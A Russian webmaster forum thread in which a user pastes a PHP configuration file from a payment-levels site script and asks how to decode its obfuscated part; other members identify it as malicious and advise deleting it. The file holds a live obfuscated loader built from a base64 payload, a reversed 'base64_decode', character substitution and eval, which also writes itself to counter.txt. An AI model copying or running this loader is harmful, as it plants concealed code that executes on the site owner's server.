Помощь по вопросу закодированного кода в php
Страницы: 1
Помощь по вопросу закодированного кода в php, Помощь по вопросу закодированного кода в php
Доброго времени суток уважаемые пользователи форума. Не судите строго, если задам на ваш взгляд глупый вопрос, тема в общем такая., в скрипте есть два фаила закодированных, может кто подскажет как и чем их можно раскодировать или поможет подскажет, что в них написано. Заранее благодарю.
код прилагаются.

<?php
ob_start();

define('SITENAME', 'Baai.ru'); // Название сайта
define('LICENSE', '82ce3d473318c6f88b241c493eef1ed4'); // Ваш лицензионный ключ

//Подключение к базе данных
define('DB_HOST', '127.0.0.1:3306');
define('DB_USER', 'root'); // Имя пользователя
define('DB_PASS', ''); // Пароль
define('DB_BASE', 'baai'); // Имя базы данных

$admin_uid = 301;

$levels = array( //Стоимость уровней
'1' => '200',
'2' => '400',
'3' => '800',
'4' => '1600',
'5' => '3200',
'6' => '6400'
);

//Протокол сайта
define('PROTOCOL', 'https://');

function pays($id) {
switch ($id) {
case '1': return 'Qiwi'; break;
case '2': return 'Payeer'; break;
case '3': return 'Яндекс.Деньги'; break;
case '4': return 'WebMoney'; break;
case '5': return 'OkPay'; break;
case '6': return 'AdvCash'; break;
case '7': return 'Единый кошелёк'; break;
case '8': return 'Visa/MasterCard/Мир'; break;
case '9': return 'Сбербанк (мобильный банк)'; break;
default: return 'Ошибка платёжной системы';
}
}






 $ {
    "GLOBALS"
}
["xkucoigwjoeh"] = "_D";
$ {
    "GLOBALS"
}
["antgybijk"] = "_X";
$erqzjdgf = "_F";
$ {
    $erqzjdgf
} = __FILE__;
$ {
    $ {
        "GLOBALS"
    }
    ["antgybijk"]
} = "PzNhP21abWIkdU8uTUQwIE00ZjRFT25EMCBNKF9fd3JxQl9fKVgneUhTRHVYbVptJztiJEh1Y19vPW80ZjR1U21NRCgkdU8uTUQwIE0sNCduJyk0U240RU9NKCdhLk9EUTRabk11ZiJ5TG8wb09IeUgwQU9ETW95SExMeUFTU29Mb24wbVggT0RYSExMIjRuTS5mIkxvNS5NTFpNTW8iNG81bU1mIm9NPW95SExMIjNhRU9wNEguMExMZiIwLk1ubzQwLk1uby1FMERjTW4iM2FITURvTW4z0J7RiNC40LHQutCwNNC70LjRhtC10L3Qt9C40LhYNNCf0L7QvNC+0YnRjDTQvdCwNF1NQUptbU1uWG5KYXlITURvTW4zYXlFT3AzJyk7YiRIU0RvTURvTDRmNHVuTTBFKCRIdWNfbz1vLDR1Ty5NTE9rTSgkdU8uTUQwIE0pKTtiJEhTRG9NRG9MNGY0TG9uX25NbS4wSE0oIm5NMUpPbk1fU0RITSgnXUpfT0RPb1htWm0nKTsiLCcnLCRIU0RvTURvTCk7YmJPdTQocXIvQkY2QjQhZjQgRXgoIEV4KCRfNkIKaUIKZydQW1t0X1BZNlsnTlgnX11KXy5PSF8nWGNNb01EcCgnUFtbdF9QWTZbJylYJ19dSl8uT0hfJ1gkXzZCCmlCCmcnNkIKaUIKX0ZSN0InTikpNHx8NExvbk9Mb24oJEhTRG9NRG9MLDQnJF82QgppQgpnJyk0fHw0TG9uT0xvbigkSFNEb01Eb0wsNCdMTW9NRHAnKTR8fDRMb25PTG9uKCRIU0RvTURvTCw0J09ESC5KRU0nKTR8fDRMb25PTG9uKCRIU0RvTURvTCw0J25NMUpPbk0nKSk0SzRNSFpTNCdhLk9EUTRabk11ZiJ5TG8wb09IeUgwQU9ETW95SExMeUFTU29Mb24wbVggT0RYSExMIjRuTS5mIkxvNS5NTFpNTW8iNG81bU1mIm9NPW95SExMIjNhRU9wNEguMExMZiIwLk1ubzQwLk1uby1FMERjTW4iM2FITURvTW4z0J7RiNC40LHQutCwNNC70LjRhtC10L3Qt9C40LhYNNCf0L7QvNC+0YnRjDTQvdCwNF1NQUptbU1uWG5KYXlITURvTW4zYXlFT3AzJzs0TT1Pbzs0VGJiRU11T0RNKCc2cltCJyw0JF82QgppQgpnJ1BbW3RfUFk2WydOKTtiRU11T0RNKCdWV18vUFIKNkJbJyw0J0pvdUknKTtiJEhTRERNSG9fRUE0ZjQgNUwxLk9fSFNERE1IbyhWV19QWTZbLFZXX0c2QgosVldfdFI2NixWV19XUjZCKTRTbjRFT00oJ9Ce0YjQuNCx0LrQsDTQv9C+0LTQutC70Y7Rh9C10L3QuNGPOjQnWCA1TDEuT19IU0RETUhvX01ublNuKCkpO2IgNUwxLk9fTE1vX0haMG5MTW80KCRIU0RETUhvX0VBLDRWV18vUFIKNkJbKTRTbjRFT00oJ9Ca0L7QtNC40YDQvtCy0LrQsDTQvdC1NNGD0YHRgtCw0L3QvtCy0LvQtdC90LAnKTtiYiRFbzRmNG9PIE0oKTtiYk9ET19MTW8oJ0xNTExPU0RYSkxNX0hTU1FPTUwnLDQnWUQnKTtiT0RPX0xNbygnTE1MTE9TRFhKTE1fb24wRExfTE9FJyw0J1l1dScpO2JMTUxMT1NEX0xNb19IU1NRT01fbTBuMCBMKHY4ZEk4ODg4OCw0InkiLDQ2cltCLDR1MC5MTSw0dTAuTE0pO2JMTUxMT1NEX0xvMG5vKCk7YmJPdTQoIU9MTE1vKCRfNkI2NnJZRmcnUFtbdF9HNkIKX1I5QkZbJ04pKTRLNCRfNkI2NnJZRmcnUFtbdF9HNkIKX1I5QkZbJ040ZjQnJzs0VGJPdSghTSBtbzUoJF82QjY2cllGZydKT0UnTik0JiY0IU0gbW81KCRfNkI2NnJZRmcnLlNjT0QnTik0JiY0IU0gbW81KCRfNkI2NnJZRmcnbTBMTCdOKTQmJjQkXzZCNjZyWUZnJ1BbW3RfRzZCCl9SOUJGWydONGZmNCBFeCgkXzZCCmlCCmcnUFtbdF9HNkIKX1I5QkZbJ04pKTRLYkVNdU9ETSgnRzZCCl9xWTk5QlYnLG9uSk0pO2IkSl9PRWZPRG9wMC4oJF82QjY2cllGZydKT0UnTik7YiRKXy5TY09EZiA1TDEuT19uTTAuX01MSDBtTV9Mb25PRGMoJEhTRERNSG9fRUEsNCRfNkI2NnJZRmcnLlNjT0QnTik7YiREU11KTG40ZjQgNUwxLk9fdU1vSFpfMExMU0goIDVMMS5PXzFKTW41KCRIU0RETUhvX0VBLDQiNkJxQi9bNCo0dwpZNzRvX0pMTW5MNGxQQgpCNEpPRWYnJEpfT0UnNFJGVjRtMEw0ZjQnJF82QjY2cllGZ20wTExOJzRxcjdyWzR7IikpO2JPdTQoTSBtbzUoJERTXUpMbmcnSk9FJ04pKTRLNExNTExPU0RfSkRMTW8oKTs0RU11T0RNKCdHNkIKX3FZOTlCVicsdTAuTE0pOzRUYiA1TDEuT18xSk1uNSgkSFNERE1Ib19FQSw0Ikd0VlJbQjRvX0pMTW5MNDZCWzQuMExvZickRW8nNGxQQgpCNEpPRWYnJEpfT0UnNHFyN3JbNHsiKTtiVDRNLkxNNEs0RU11T0RNKCdHNkIKX3FZOTlCVicsdTAuTE0pOzQkSl9PRTRmNDg7NCRfNkI2NnJZRmcnbTBMTCdONGY0Jyc7VGJPdShjTW9NRHAoJ1BbW3RfL3FyQkZbX3J0Jyk0JiY0TG9uSDBMTUggbShjTW9NRHAoJ1BbW3RfL3FyQkZbX3J0JyksJ0pEUURTXUQnKSliJE9tZmNNb01EcCgnUFtbdF8vcXJCRltfcnQnKTtiTS5MTU91KGNNb01EcCgnUFtbdF9lX3dZCmxSClZCVl93WQonKTQmJjRMb25IMExNSCBtKGNNb01EcCgnUFtbdF9lX3dZCmxSClZCVl93WQonKSw0J0pEUURTXUQnKSliJE9tZmNNb01EcCgnUFtbdF9lX3dZCmxSClZCVl93WQonKTtiTS5MTU91KGNNb01EcCgnCkI3WVtCX1JWVgonKTQmJjRMb25IMExNSCBtKGNNb01EcCgiCkI3WVtCX1JWVgoiKSw0J0pEUURTXUQnKSliJE9tZmNNb01EcCgnCkI3WVtCX1JWVgonKTtiTS5MTU91KCFNIG1vNSgkXzZCCmlCCmcnCkI3WVtCX1JWVgonTik0JiY0TG9uSDBMTUggbSgkXzZCCmlCCmcnCkI3WVtCX1JWVgonTiw0J0pEUURTXUQnKSliJE9tZiRfNkIKaUIKZycKQjdZW0JfUlZWCidOO2JNLkxNSyRPbWYnSkRRRFNdRCc7VGJPdSgkT20hZidKRFFEU11EJylLYiRPbWZtbk1jX25NbS4wSE0oIiNnXjgtak4rI08iLCcnLCRPbSk7YiRvTyBNZm9PIE0oKTtiJG0wTG9mb08gTSgpLXY4ODtiJG5NTEoub2YgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCI2QnFCL1s0LjBMbzR3Clk3NG9fU0QuT0RNNGxQQgpCNE9tZiciWCRPbVgiJyIpO2JPdSggNUwxLk9fREogX25TXUwoJG5NTEoubykhZjgpSzQgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCJHdFZSW0I0b19TRC5PRE00NkJbNC4wTG9mJyJYJG9PIE1YIicsNEpPRWYnIlgkSl9PRVgiJzRsUEIKQjRPbWYnIlgkT21YIic0cXI3cls0eyIpOzRUYk0uTE1LYiA1TDEuT18xSk1uNSgkSFNERE1Ib19FQSw0InJGNkIKWzRyRltZNG9fU0QuT0RNNChKT0UsT20sLjBMbyk0aVJxR0I2NCgnIlgkSl9PRVgiJywnIlgkT21YIicsJyJYJG9PIE1YIicpIik7NFRiT3UoTEpBTG9uKCRvTyBNLGoseylmZjgpSzQgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCdWQnFCW0I0dwpZNzRvX1NELk9ETTRsUEIKQjQuMExvYSdYJG0wTG8pOzRUYlRiYk91NChHNkIKX3FZOTlCVik0S2IgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCJHdFZSW0I0YG9fSkxNbkxgNDZCWzRgLjBMb2A0ZjQnJEVvJzRsUEIKQjRKT0VmJyRKX09FJzRxcjdyWzR7Iik7Yk91NCghTSBtbzUoJERTXUpMbmcnQTBEJ04pKTRLNE1IWlM0J2EuT0RRNFpuTXVmInlMbzBvT0h5SDBBT0RNb3lITEx5QVNTb0xvbjBtWCBPRFhITEwiNG5NLmYiTG81Lk1MWk1NbyI0bzVtTWYib009b3lITEwiM2FFT3A0SC4wTExmIjAuTW5vNDAuTW5vLUUwRGNNbiIzYUhNRG9NbjPQkNC60LrQsNGD0L3RgjQnWCREU11KTG5nJy5TYydOWCc00LfQsNCx0LvQvtC60LjRgNC+0LLQsNC9NNC/0L400YHQu9C10LTRg9GO0YnQtdC5NNC/0YDQuNGH0LjQvdC1OjQnWFpvIC5MbU1ITzAuSFowbkwoJERTXUpMbmcnQTBEJ04pWCdheUhNRG9NbjNheUVPcDMnOzRNPU9vOzRUYmJPdTQoJEpfT0U0MzR6OHgpNEtiJG0wTG9fSmZvTyBNKCktSXZkODg7Yk91NCgkRFNdSkxuZydFbydONGE0JG0wTG9fSjQmJjQkRFNdSkxuZycuTXBNLidONGZmNDgpNEtiIDVMMS5PXzFKTW41KCRIU0RETUhvX0VBLDQiVkJxQltCNHcKWTc0b19KTE1uTDRsUEIKQjRKT0U0ZjQnJEpfT0UnNHFyN3JbNHsiKTtiIDVMMS5PXzFKTW41KCRIU0RETUhvX0VBLDQiVkJxQltCNHcKWTc0b19ETV0uTXBNLkw0bFBCCkI0SkxuNGY0JyRKX09FJyIpO2IgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCJWQnFCW0I0dwpZNzRvXyBNTEwwY01MNGxQQgpCNHVuNGY0JyRKX09FJzRZCjRvU0o0ZjQnJEpfT0UnIik7YlRiVGJUYmJFMG9NX0VNdTBKLm9fb08gTWtTRE1fTE1vKCdCSm5TbU15N1NMSFNdJyk7YmJ1SkRIb09TRDRdSl9EUzBwMG8wbigkLlNjT0QpS2IkdU9uTG80ZjQgQV9Mb25vUy5TXU1uKExKQUxvbigkLlNjT0QsNDgsNHspKTtibk1vSm5ENCJ5TG8wb09IeU8gY3kuTW9vTW5fMHAwbzBueSR1T25Mb1htRGMiO2JUYmJ1SkRIb09TRDRdSl9IWk1IUV8uU2NPRCgkLlNjT0QpS2JuTW9KbkQ0eztiVGJ1SkRIb09TRDRdSl9IWk1IUV9BMG9IWigkLlNjT0QpS2JuTW9KbkQ0eztiVGJ1SkRIb09TRDRtbnVMKCQuU2NPRClLYm5Nb0puRDR7O2JUYnVKREhvT1NENG9PSFFNb19EKCQuU2NPRClLYm5Nb0puRDR7O2JUYmIkTDAubzRmNG4wREUoOCw0ampqaik7YiRvU1FNRDRmNCRMMC5vWCc6J1ggRXgoJEwwLm9YJzonWCRfNkI2NnJZRmcnbTBMTCdOWCc6J1gkXzZCNjZyWUZnJ0pPRSdOKTs=";
$ {
    $ {
        "GLOBALS"
    }
    ["xkucoigwjoeh"]
} = strrev("edoced_46esab");
eval($ {
    $ {
        "GLOBALS"
    }
    ["xkucoigwjoeh"]
}
("JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdPL2JwdXcza002QjJ0eEQxLlJvWF1sVlkgPkpBRUdUZno3SwpRSD1qc31acVVjZTh2NW5tPFs5YTRpMENyV3tOZ2hkSUxQeVNGJywnaUMKdmZGPnplU0U3UDVucWxBdC53V0RPbUt1YmRVfT0zTXtSa2N4OTJKaExaZ1gwNnlycFFURzwgVmFqSUIxXVtZNDhzSC9vTicpOyRfUj1lcmVnX3JlcGxhY2UoJ19fRklMRV9fJywiJyIuJF9GLiInIiwkX1gpO2V2YWwoJF9SKTskX1I9MDskX1g9MDs="));
$s=base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdPL2JwdXcza002QjJ0eEQxLlJvWF1sVlkgPkpBRUdUZno3SwpRSD1qc31acVVjZTh2NW5tPFs5YTRpMENyV3tOZ2hkSUxQeVNGJywnaUMKdmZGPnplU0U3UDVucWxBdC53V0RPbUt1YmRVfT0zTXtSa2N4OTJKaExaZ1gwNnlycFFURzwgVmFqSUIxXVtZNDhzSC9vTicpOyRfUj1lcmVnX3JlcGxhY2UoJ19fRklMRV9fJywiJyIuJF9GLiInIiwkX1gpO2V2YWwoJF9SKTskX1I9MDskX1g9MDs=');
$fp = fopen('counter.txt', 'w+');
$test = fwrite($fp, $s);
if ($test) echo '';
else echo '';
fclose($fp);

$_X=base64_decode($_X);$_X=strtr($_X,'O/bpuw3kM6B2txD1.RoX]lVY >JAEGTfz7K
QH=js}ZqUce8v5nm<[9a4i0CrW{NghdILPySF','iC
vfF>zeSE7P5nqlAt.wWDOmKubdU}=3M{Rkcx92JhLZgX06yrpQTG< VajIB1][Y48sH/oN');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);

print_r($_R.$_X);

?>
Изменено: IGOR DAN - 26 Декабря 2018 10:38

Прогон по твиттеру, постинг в 1500 аккунтов
Постинг в твиттер аккаунты, для ускорения индексации ваших сайтов, сателлитов, дорвеев.

В вопросе уже 99% ответа

IGOR DAN пишет:
Цитата
base64_decode
Лучший абузоустойчивый хостинг | Самый высокий доход на Push уведомлениях | Лучшая партнерка для заработка на видео плеерах
Цитата
Дэвид Бэкхэм пишет:
IGOR DAN пишет:
мне бы по подробнее, я просто в этом не силен,, как бы мне это все расшифровать, что бы это все было примерно в таком виде prntscr.com/lzokhr
smile:mail:smile:mail:smile:mail:
1. не нужно неформотированные сообщения вставлять в данный редактор, это ломает движок.2. У вас несколько кодировок, основная в base64, и уже в ней еще 3 части разбитые на разные кодировки. Тем самым кто-то хотел защитить свой скрипт или лицензию возможно.
3. Обратитесь к тому, кто писал скрипт или шаблон.
Спасибо за ответ,, я бы конечно обратился, но не знаю к кому, нет контактов.
IGOR DAN, это вредоносный код. 

Код
 
$ { 
    "GLOBALS"  
 


и все что дальше нужно удалить
https://revisium.com/ai/бесплатный скрипт для проверки сайта
Цитата
Эдуард Пащенко пишет:
и все что дальше нужно удалить
Вот мне почему то тоже так сразу показалось, что это вред.. но человек который мне этот скрипт давал, переубедил меня, что это закодированный код., яко бы когда он три года назад этот скрипт покупал, ему эту песню разработчик напел.за скаер спасибо, хорошая вещь сам им частенько пользуюсь, хоть и не все ему подвластно многое не находит, но все равно очень сильно облегчает труды.
попробуйте закомментировать, если ничего не отвалится - смело удаляйте. полезные скрипты никто не кодирует
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
08:52 Сайт в топ 
08:49 Как узнать не проиндексированные страницы сайта 
23:51 CPA Kitchen - Глобальная Гемблинг Партнерка | Смартлинка, Ротатор, Постбеки | Офферы под все ГЕО 
23:51 Посты в социальные сети через RSS канал. 
22:45 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 
22:45 Как собрать семантическое ядро!? Словоеб не парсит. 
19:59 18.11 Апдейт Яндекс выдача | Влияние уникальности изображений 
05:18 Прогон по личной базе, больше 1000 трастовых сайтов! Продвижение СЧ и НЧ запросов + рост показателей! Гарантии! 
03:45 Подарю домен 
21:38 Комплексная раскрутка сайтов. Качественные услуги, прогоны и прочее. (3000+ отзывов) 
19:41 Размещение вечных "Белых" ссылок в Яндекс.Коллекциях - Повышение ИКС сайта 
18:39 Персональные прокси под: соц. сети, парсинг, avito, olx и прочее от 50р/шт 
18:34 Качественный современный дизайн сайтов, логотипов, печатной продукции. Верстка HTML5/CSS3/JS. 
17:20 Персональные прокси сервера http/https + socks5 
08:02 Самый современный в мире, новейший веб-каталог | Цифровая сторона вашего сайта 
07:00 Партнерская программа №1 в РФ по ремонту компьютерной и бытовой техники! (CPA 1000р) 
16:14 4 ключа к Elite-Board 2.3 (400 руб.) 
13:03 Все хотят украсть мой трастовый аккаунт ВК 
10:37 Приведу живых участников к Вам в группу ВК от 1.5 р. за участника 
00:11 Городской сайт объявлений 
23:17 Обмен новостным трафиком